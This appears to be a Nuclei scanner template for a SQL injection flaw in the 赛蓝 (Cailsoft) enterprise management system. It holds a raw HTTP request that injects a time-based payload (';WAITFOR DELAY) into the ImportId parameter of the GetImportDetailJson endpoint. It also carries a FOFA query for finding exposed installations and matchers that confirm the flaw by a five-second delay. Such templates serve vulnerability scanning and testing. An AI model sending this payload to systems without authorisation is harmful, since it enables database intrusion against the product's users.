id: cailsoft-getImportdetailjson-sqli

info:
  name: 赛蓝企业管理系统 GetImportDetailJson SQL注入
  author: qwtd
  severity: high
  description: 赛蓝企业管理系统 GetImportDetailJson SQL注入
  metadata:
    fofa-query: body="www.cailsoft.com"||body="赛蓝企业管理系统"
  tags: 赛蓝企业管理系统

http:
  - raw:
      - |
        @timeout: 30s
        GET /BaseModule/ExcelImport/GetImportDetailJson?ImportId=1%27%3bWAITFOR+DELAY+%270%3a0%3a5%27--&IsShow=1 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip
        Connection: close

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "duration>=5"
      - type: status
        status:
          - 200
      - type: word
        part: body
        words:
          - "[]"
